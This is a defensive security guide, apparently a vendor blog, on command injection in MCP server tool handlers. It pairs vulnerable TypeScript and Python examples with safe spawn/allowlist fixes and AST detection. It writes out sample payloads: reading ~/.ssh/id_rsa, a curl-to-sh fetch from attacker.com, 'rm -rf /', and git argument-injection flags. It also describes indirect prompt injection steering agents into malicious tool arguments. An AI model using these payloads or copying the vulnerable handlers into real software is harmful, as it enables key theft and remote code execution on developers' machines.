MCP server command injection — when tool arguments become shell commands

Command injection in an MCP server is straightforward in mechanism and severe in consequence: a tool handler receives an argument from a language model, constructs a shell command using that argument, and executes it. Whatever the argument contains — a legitimate filename, or ; rm -rf / — the shell will interpret it. Command-exec findings are present in 43% of the SkillAudit corpus, making it one of the most common patterns we identify. Combined with the fact that most MCP servers run with local filesystem access on the developer's own machine, it's also the most consequential class we track.

TL;DR

Command injection in MCP servers happens when a tool handler passes an LLM-provided argument to a shell command through template-string interpolation in exec(), an argv array built by splitting input, or the shell: true option on spawn(). MCP amplifies the risk: the agent calls the tool automatically, no human reviews the argument before execution, and the server typically runs on the local machine with broad filesystem permissions. Detection is reliable via static AST analysis (which is what SkillAudit's security axis does). Prevention is also reliable: always use spawn() or execFile() with an array argv, never pass a shell string, and validate each argument against an allowlist of safe values before the command executes.

How command injection works in MCP servers

The Model Context Protocol doesn't execute shell commands — it routes tool calls between an agent and a server process. The server process, however, often does execute shell commands: to run git, grep, ffmpeg, pandoc, or any other CLI tool the author wanted to expose through the MCP interface. This is a common and legitimate pattern. The injection risk emerges at the point where the server constructs the command string using input it received from the agent.

Node.js's child_process.exec() and Python's subprocess.run(shell=True) both execute their argument by spawning a shell: /bin/sh -c "..." on Unix, cmd.exe /c "..." on Windows. The shell interprets the string, which means it interprets shell metacharacters: ;, &&, ||, $(), backticks, pipes, redirects. If any of those characters appear in an argument the server interpolates into the command string, the shell executes the additional commands they introduce.
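The difference between the two execution modes can be seen with a harmless payload. The following is a minimal sketch, assuming a POSIX system with /bin/sh and an echo binary on PATH; the payload string is a stand-in for an attacker-controlled tool argument.

```python
import subprocess

# Harmless stand-in for an attacker-controlled tool argument.
payload = "README.md; echo INJECTED"

# shell=True: /bin/sh parses the whole string, so ';' starts a second command.
via_shell = subprocess.run(
    f"echo {payload}", shell=True, capture_output=True, text=True
).stdout

# List argv: the OS hands the payload to echo as one literal argument.
via_argv = subprocess.run(
    ["echo", payload], capture_output=True, text=True
).stdout

print(repr(via_shell))  # two lines of output: the second command ran
print(repr(via_argv))   # one line: the ';' was never interpreted
```

In the first call the shell sees two commands; in the second there is no shell, so the semicolon is just a character in a filename-like string.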

The LLM-provided argument can contain those characters because the LLM is constructing the argument from its context window, which may include attacker-controlled content — a file the agent read, a URL it fetched, a user message that included an injection payload. The agent doesn't validate what it passes; it generates the argument in response to instructions, and those instructions may have been crafted to produce a malicious argument.

Three common patterns

Pattern 1 — Template-string interpolation in exec()

The most common pattern: a template literal (or Python f-string) that interpolates the tool argument directly into the command string passed to exec().

// TypeScript — VULNERABLE
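import { exec as execCallback } from 'node:child_process';
import { promisify } from 'node:util';
const exec = promisify(execCallback);  // callback-style exec() returns no promise to await

server.tool('git_log', { path: z.string() }, async ({ path }) => {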
  const { stdout } = await exec(`git log --oneline -- ${path}`);
  return { content: [{ type: 'text', text: stdout }] };
});

# Python — VULNERABLE
@server.tool()
async def read_file(path: str) -> str:
    result = subprocess.run(f"cat {path}", shell=True, capture_output=True, text=True)
    return result.stdout

If path is README.md; cat ~/.ssh/id_rsa, the shell executes both commands. If it's README.md $(curl -s attacker.com/payload | sh), it executes an arbitrary remote script. The template-string construction is the injection point — anything that puts user input into a shell string without escaping it is vulnerable by definition.
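When a shell string genuinely cannot be avoided, escaping is the fallback. Passing a list argv without a shell remains the preferred fix. The sketch below uses Python's shlex.quote, which targets POSIX shells only; the cat_command helper is a hypothetical name introduced for illustration.

```python
import shlex

def cat_command(path: str) -> str:
    """Build a shell string in which the argument is quoted as a single word."""
    # "--" additionally stops cat from reading the path as an option.
    return f"cat -- {shlex.quote(path)}"

hostile = "README.md; cat ~/.ssh/id_rsa"
command = cat_command(hostile)
print(command)  # cat -- 'README.md; cat ~/.ssh/id_rsa'
```

Quoted this way, the shell treats the whole payload as one (nonexistent) filename. Escaping is easy to forget at one call site, which is why removing the shell entirely is the more robust choice.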

Pattern 2 — Array argv built from split input

A subtler pattern: the server uses execFile() or spawn() (both of which bypass the shell by default) but builds the argv array by splitting a tool argument on spaces. No shell parses the input, yet the agent still decides every argument the binary receives, which re-creates much of the exposure that array argv was meant to remove.

// VULNERABLE — splitting argument re-creates the shell parsing problem
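import { execFile as execFileCallback } from 'node:child_process';
import { promisify } from 'node:util';
const execFile = promisify(execFileCallback);  // promisified so the call below can be awaited

server.tool('run_command', { args: z.string() }, async ({ args }) => {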
  const argv = args.split(' ');  // agent controls each element of argv
  const { stdout } = await execFile('/usr/bin/git', argv);
  return { content: [{ type: 'text', text: stdout }] };
});

With no shell involved, the agent can't use shell metacharacters. But it can still pass unexpected arguments to the binary: --upload-pack=malicious-command, --exec-path=/tmp/malicious, or simply arguments the server didn't intend to expose. This is argument injection rather than shell injection, and closing it requires an allowlist: the server builds argv itself and accepts only specific, validated values from the agent.
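One way to close that surface is for the server to own the argv layout and accept only narrowly typed values. The sketch below is an illustration under assumptions: build_git_log_argv, SAFE_PATH, and the limits on max_count are hypothetical choices, not taken from any particular server.

```python
import re

# Hypothetical policy for a git_log tool: the only caller-controlled values
# are a commit count and a relative path.
SAFE_PATH = re.compile(r"[A-Za-z0-9_./-]+")

def build_git_log_argv(path: str, max_count: int = 20) -> list[str]:
    """Return a fixed-shape argv; raise ValueError for anything unexpected."""
    if not 1 <= max_count <= 200:
        raise ValueError("max_count out of range")
    # Reject option-like values and anything outside the allowed characters.
    if path.startswith("-") or not SAFE_PATH.fullmatch(path):
        raise ValueError("path not allowed")
    # Everything after "--" is read by git as a pathspec, never as an option.
    return ["git", "log", "--oneline", f"--max-count={max_count}", "--", path]
```

The agent never supplies a flag. It supplies a number and a path, and the server decides where each one goes in the command line.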

Pattern 3 — shell: true option with constructed string

The most explicit form: spawn() called with { shell: true } and a constructed command string. This option tells Node.js to execute the command through the shell rather than directly — it's equivalent to exec() for injection purposes.

// VULNERABLE — shell: true converts spawn() back into exec() behavior
server.tool('convert_file', { input: z.string(), format: z.string() }, async ({ input, format }) => {
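  // spawn() returns a ChildProcess rather than a promise, so output is gathered
  // with the same collectOutput helper the safe example below relies on
  const proc = spawn('ffmpeg', ['-i', input, '-c:v', format, 'output.mp4'], { shell: true });
  const stdout = await collectOutput(proc, { maxBytes: 32_000, timeoutMs: 30_000 });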
  return { content: [{ type: 'text', text: stdout }] };
});

With shell: true, the arguments array is joined and passed to the shell as a string. The input or format arguments can inject additional shell commands through the same mechanism as pattern 1.

Why MCP amplifies the risk

Command injection has existed as a vulnerability class for decades. What's new with MCP is the combination of three factors that makes injection more likely to succeed and harder to catch before it does:

Automated invocation — no human reviews the argument before execution. In a traditional web form, a user types a value, submits it, and a developer can review their logs to see what inputs arrive at command-building code. In an MCP context, the LLM constructs the argument and the tool handler executes in milliseconds, with no human step in between. An injected argument that arrives at exec() is already running before anyone could have noticed.

Indirect injection via tool responses. The argument the LLM provides doesn't have to come from the user's original message. It can be constructed from content the agent processed in earlier tool calls — a file it read, a page it fetched, an API response it parsed. An attacker who can place content in any of those sources can craft an injection payload that the LLM will incorporate into a subsequent tool argument. This is the indirect prompt injection pathway: the attacker controls neither the user's message nor the tool call directly, but they control the content the LLM reads, and that's enough.

Local filesystem access. Most MCP servers in the corpus run on the developer's local machine with the permissions of the developer's process, meaning they can read the developer's SSH keys, environment variables, credentials, and source code. A successful command injection against a local MCP server gives the attacker command execution with the developer's privileges, so the blast radius starts at full read access to the developer's home directory and extends to anything else that account can do.

Detection via AST analysis

Command injection in MCP servers is reliably detectable via static AST (abstract syntax tree) analysis. The pattern has a specific shape: a variable introduced as a tool handler parameter that appears inside a template literal or string concatenation that's then passed to exec(), spawn({ shell: true }), or equivalent. Tree-sitter and other AST parsers can express this as a query that identifies the taint path from handler argument to shell sink.

SkillAudit's security axis runs this AST analysis as part of the static scan. It identifies the tool handler, the argument name, and the specific line where the argument reaches the shell sink. The finding report names the file and line so the author can navigate directly to the vulnerable code without searching.

The static check also catches the shell: true pattern by looking for spawn() calls with that option anywhere in the module — even if the argument construction isn't immediately obvious from context — and flags them for manual review if an argument from a tool handler's parameter list is in scope at the call site.
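The shape of such a check can be sketched with Python's built-in ast module. This is a deliberately simplified illustration, not SkillAudit's implementation: it swaps Tree-sitter for ast, handles Python sources only, and treats any function parameter that appears inside the first argument of a shell=True call as tainted. The names find_shell_sinks, SHELL_SINKS, and SAMPLE are hypothetical.

```python
import ast

# subprocess entry points that accept shell=True.
SHELL_SINKS = {"run", "call", "check_call", "check_output", "Popen"}

def find_shell_sinks(source: str) -> list[tuple[int, str]]:
    """Return sorted (line, parameter) pairs where a parameter reaches a shell=True call."""
    findings = set()
    for func in ast.walk(ast.parse(source)):
        if not isinstance(func, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        params = {arg.arg for arg in func.args.args}
        for call in ast.walk(func):
            if not isinstance(call, ast.Call) or not call.args:
                continue
            target = call.func
            name = target.attr if isinstance(target, ast.Attribute) else getattr(target, "id", "")
            uses_shell = any(
                kw.arg == "shell"
                and isinstance(kw.value, ast.Constant)
                and kw.value.value is True
                for kw in call.keywords
            )
            if name not in SHELL_SINKS or not uses_shell:
                continue
            # Any parameter referenced in the command expression (f-string,
            # concatenation, .format call) is reported as reaching the sink.
            for node in ast.walk(call.args[0]):
                if isinstance(node, ast.Name) and node.id in params:
                    findings.add((call.lineno, node.id))
    return sorted(findings)

SAMPLE = '''
import subprocess

def read_file(path: str) -> str:
    result = subprocess.run(f"cat {path}", shell=True, capture_output=True, text=True)
    return result.stdout

def safe_read(path: str) -> str:
    result = subprocess.run(["cat", path], capture_output=True, text=True)
    return result.stdout
'''

print(find_shell_sinks(SAMPLE))  # [(5, 'path')]
```

A production scanner would also need to follow assignments (a parameter copied into a local variable before reaching the sink) and recognize framework-specific handler registration, both of which this sketch ignores.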

Prevention — spawn with array argv and argument allowlists

// SAFE — spawn() with array argv, never shell: true
// Argument validated against allowlist before reaching the command

const ALLOWED_FORMATS = new Set(['mp4', 'webm', 'mp3', 'wav']);
const SAFE_FILENAME = /^[\w.\-]+$/;

server.tool('convert_file',
  {
    input: z.string().max(256).regex(SAFE_FILENAME),
    format: z.enum(['mp4', 'webm', 'mp3', 'wav'])
  },
  async ({ input, format }) => {
    if (!ALLOWED_FORMATS.has(format)) throw new Error('Format not allowed');
    if (!SAFE_FILENAME.test(input)) throw new Error('Filename not allowed');

    // Array argv — shell never interprets these as a string
    const proc = spawn('ffmpeg', ['-i', input, '-c:v', 'libx264', `output.${format}`], {
      shell: false  // explicit — this is the safe default but worth stating
    });

    const stdout = await collectOutput(proc, { maxBytes: 32_000, timeoutMs: 30_000 });
    return { content: [{ type: 'text', text: stdout }] };
  }
);

Three mitigations stack here: the Zod schema uses z.enum() for the format argument — eliminating the injection surface for that argument entirely because the value must be one of a finite set of safe strings. The filename argument is validated against a strict regex that allows only word characters, dots, and hyphens. And the command is executed with spawn() using an array argv with shell: false — the OS executes the binary directly with the argument list, without a shell to interpret metacharacters.

# Python — SAFE equivalent
import re
import subprocess
from typing import Literal

# re.ASCII keeps \w to [A-Za-z0-9_], matching the JavaScript regex above
SAFE_FILENAME = re.compile(r'[\w.\-]+', re.ASCII)

@server.tool()
async def convert_file(
    input: str,
    format: Literal['mp4', 'webm', 'mp3', 'wav']
) -> str:
    # fullmatch() rather than match() with '$': in Python, '$' also matches
    # just before a trailing newline, so 'a.mp4\n' would otherwise pass
    if not SAFE_FILENAME.fullmatch(input):
        raise ValueError("Filename not allowed")
    # List argv: subprocess never invokes a shell
    result = subprocess.run(
        ['ffmpeg', '-i', input, '-c:v', 'libx264', f'output.{format}'],
        capture_output=True, text=True, timeout=30
    )
    return result.stdout[:32_000]

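In Python, the equivalent is subprocess.run() with a list argument and no shell=True. The Literal annotation (from the standard typing module) declares the format allowlist; it is enforced at call time only when the server framework validates arguments against the type hints, as Pydantic-based frameworks do. The timeout parameter prevents unbounded execution.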
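Because the handler is declared async, a blocking subprocess.run() call stalls the event loop while the child process runs. A non-blocking variant of the same idea can be sketched with asyncio.create_subprocess_exec, which also takes an argv sequence and never invokes a shell. The run_bounded helper and its defaults are hypothetical, loosely mirroring the output and time limits used in the TypeScript example.

```python
import asyncio

async def run_bounded(argv: list[str], max_bytes: int = 32_000, timeout_s: float = 30.0) -> str:
    """Run argv without a shell; enforce a timeout and truncate captured stdout."""
    proc = await asyncio.create_subprocess_exec(
        *argv,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.DEVNULL,
    )
    try:
        stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=timeout_s)
    except asyncio.TimeoutError:
        # Kill and reap the child so a hung process does not linger.
        proc.kill()
        await proc.wait()
        raise
    # communicate() buffers all output before this truncation; a hard memory
    # cap would require reading the stream incrementally instead.
    return stdout[:max_bytes].decode(errors="replace")
```

Inside a handler this would be called as `await run_bounded(['ffmpeg', '-i', input, ...])`, after the same validation steps shown above.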
